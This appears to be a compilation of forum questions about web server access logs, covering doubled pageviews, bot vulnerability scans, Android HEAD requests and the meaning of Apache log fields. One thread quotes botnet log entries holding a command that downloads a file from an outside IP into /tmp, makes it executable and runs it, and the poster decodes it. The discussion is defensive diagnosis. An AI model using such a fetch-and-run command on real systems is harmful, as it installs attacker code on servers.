I have a page with a flash object on it, and I would like to count the pageviews by incrementing a field by 1 in my database.
The query works fine (tested it in phpMyAdmin) and the function gets executed only once, but still the field gets incremented by 2 every time I reload the page.
When I remove the flash object from the page, the field is incremented only by 1.
Can someone explain why this is the case, and how I can prevent this behaviour?
Thanks a lot!
PS: This guy seems to have the same problem, but no solution is posted...
mysql wrong column increment
EDIT:
My logs show the following:
::1 - - [24/Aug/2013:13:42:16 +0200] "GET /page HTTP/1.1" 200 8008 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36"
::1 - - [24/Aug/2013:13:42:17 +0200] "GET /page HTTP/1.1" 200 8008 "http://localhost/page" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36"
I am quite sure, the relevant page is loaded twice in many instances, which makes for two increments. A page loading twice is what happens in at least two cases:
My flash block extension, if I chose to activate flash
Some AV/SmartScreen or whatever, that preloads the page elsewhere to check it for Flash threats
Check your webserver logs to verify!
Related
I use Wordpress on my site, recently I blocked a hacker that infected my site with A LOT of backdoors (thousands of backdoors, literally). I spend one and a half month to bet him. It wasn't my fault, the guy who was on my job before me never had updated the site.
After this, I noticed some strange access to files that just don't exist, and I think that the hacker is trying to find known exploits from wordpress plugins that I don't use. It is ok, I don't care at all. But one of those tries cought me attention.
95.249.95.104 - - [17/Jan/2020:10:17:29 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
94.200.107.2 - - [17/Jan/2020:13:52:28 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
197.226.122.184 - - [17/Jan/2020:14:57:36 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
I am hiding part of URL, sorry.
The IPs always change, even with consecutive requests with less than one second of difference, maybe a DDoS. The user-agent commonly change too, there are everything here: iPhone, iPad, Android, Windows 7, 8, 10, Firefox, Google Chrome, Internet Explorer... But Linux and Mac. Those 3 requests are the only exception.
I noticed that there are some shell commands at the URL. These ones:
cd /tmp;
rm -rf .j;
wget http://91.92.66.124/..j/.j;
chmod 777 .j;
sh .j;
echo DONE HTTP/1.1
There are no folder or file with this name on my /tmp directory.
This "karin" URL was an old site that doens't exist a long time. I don't know how he knows this URL, even I didn't knew. Everytime I try to access some URL that is configured on NGINX, but path doens't exist like this karin, I got a 404 error. But those tries given 400 error.
404 is normal, it is because there are nothing here. But 400? It means that there are something here, but it couldn't process the data sent. I removed the nginx configuration to this URL, and I tried it in other URLs. I alway got a 404 error, I tried this:
***.***.***.*** - - [17/Jan/2020:15:29:20 -0300] "joa***com.br" "GET /shell?cd+/var/www/html/conf;mkdir+teste HTTP/1.1" 404 555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" "-"
So my question is: Should I be scared of this commands returning a 400 error on this URL? Why I can't reproduce this? Aparently those tries failed, should I be sure that they failed? Which type of attack is this? I never heard about a "shell script injection by URL" like this.
It is an automatic scan made by scripts looking for web servers with bashdoor vulnerabilities.
You can, as a precaution, block all urls that contain words like shell. This type of scan is common and a webserver firewall can easily handle attack prevention.
This looks like a request from the Mozi Botnet, a botnet that searches for backdoor shells on IoT devices.
I have found lots of single requests in my access logs, that is, a "POST" request followed by "/", then a question mark ("?") followed by a few random characters which then equal to more random characters..
For example:
ps485115.dreamhost.com - - [31/Dec/2018:09:53:28 -0600] "POST /?fgko=vkma HTTP/1.1" 403 308 "http://example.com/?fgko=vkma" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
Sometimes that's the only request to the server that I can see from the ip address who's accessing my site (probably because just like in the example above, according to the access log, the visitor was already blocked).
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 4 years ago.
Improve this question
I can see in my application log some 404 error message like below
ERROR - 2018-09-07 05:31:50 --> 404 Page Not Found: Robotstxt/index
ERROR - 2018-09-07 05:31:51 --> 404 Page Not Found: Xmlrpcphp/index
ERROR - 2018-09-07 05:31:51 --> 404 Page Not Found: Blog/robots.txt
ERROR - 2018-09-07 05:31:52 --> 404 Page Not Found: Blog/index
ERROR - 2018-09-07 05:31:52 --> 404 Page Not Found: Wordpress/index
ERROR - 2018-09-07 05:31:52 --> 404 Page Not Found: Wp/index
ERROR - 2018-09-07 05:31:52 --> 404 Page Not Found: Robotstxt/index
ERROR - 2018-09-07 05:31:53 --> 404 Page Not Found: Administrator/index.php
This happening every day. I have doubt somebody trying to hack my system. because I am sure, we are not using open source library or system.
Even I checked server log also, I can see some IP address but this address keep on changing every time, so i am not able to choose IP blocker
Server Log:
194.79.31.99 - - [07/Sep/2018:05:31:50 +0400] "GET /robots.txt HTTP/1.1" 404 1130 "-"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
194.79.31.99 - - [07/Sep/2018:05:31:50 +0400] "GET / HTTP/1.1" 307 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
194.79.31.99 - - [07/Sep/2018:05:31:51 +0400] "GET /xmlrpc.php?rsd HTTP/1.1" 404 1130 "-"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
194.79.31.99 - - [07/Sep/2018:05:31:51 +0400]
"GET /blog/robots.txt HTTP/1.1" 404 1130 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
194.79.31.99 - - [07/Sep/2018:05:31:51 +0400]
Platform: PHP/Mysql
Server : linux
Already I protect my directory listing by htaccess.
How can I make more secure in my system. please help me...
It is normal your system gets attacked when it comes online. Intruders are running scripts to test for known vulnerabilities. It has nothing to do with open source or closed source libraries, both can be safe or vulnerable.
What you must do when you go on the internet with a machine is having a good professional system-admin check and maintain your machine. This is not something that someone with no deep knowledge of system-security can do.
A PHP application loses session data only in Android browser and only when logs show a HEAD request was issued immediately prior to the GET request.
Success ...
99.123.321.99 - - [05/Oct/2016:11:12:46 -0500] "GET /Success.php?response=Y HTTP/1.1" 200 6772
No session ...
98.12.21.89 - - [04/Oct/2016:22:17:15 -0500] "HEAD /Success.php?response=Y HTTP/1.1" 200 -
98.12.21.89 - - [04/Oct/2016:22:17:15 -0500] "GET /Success.php?response=Y HTTP/1.1" 200 3007
User agents are comparable, except on requests which lose the session data (returning Apache-HttpClient/UNAVAILABLE (java 1.4) ...
99.123.321.99 Mozilla/5.0 (Linux; Android 6.0; LG-H901 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36
98.12.21.89 Mozilla/5.0 (Linux; Android 6.0.1; SM-G925T Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Mobile Safari/537.36
98.12.21.89 Apache-HttpClient/UNAVAILABLE (java 1.4)
What causes the Android browser to act in this manner?
What steps can be taken to 'work around' the behavior (and preserve session data)?
It is likely that the application will be rewritten with application defined session data instead of relying upon native PHP sessions, but an immediate work around would be helpful.
Thanks in advance!
I've a website developed using PHP.
I encountered one major issue on my website, a security breach. So I checked the access logs of apache present at location "/var/log/apache2/access.log" on server.
I got following log which caused the error but I'm not able to understand what does each part of this log means. Can some one please give me step-by-step explanation of the below log?
70.39.61.42 - - [12/Jul/2015:17:05:12 +0000] "POST /user/register/javascript.void(0)/index.php?do=/user/register/ HTTP/1.1" 302 398 "http://www.mywebsite.com/user/register/javascript.void(0)" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
Actually this is the request which has created a major issue on my website. But I'm not able to figure out what parameters that request contained and what was the response, etc., etc.
Thanks in advance.
70.39.61.42
This is a IP address of someone who sent a request to your server
[12/Jul/2015:17:05:12 +0000]
This is a date when perpetrator did it
"POST /user/register/javascript.void(0)/index.php?do=/user/register/ HTTP/1.1"
This explains POST request was sent to your server to given URL
302 - This is a status code of the response - HTTP 302
398 - Indicates the size of the response sent
"http://www.mywebsite.com/user/register/javascript.void(0)"
This is a URL address of where the perpetrator came from
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
This is the user agent of the visitor.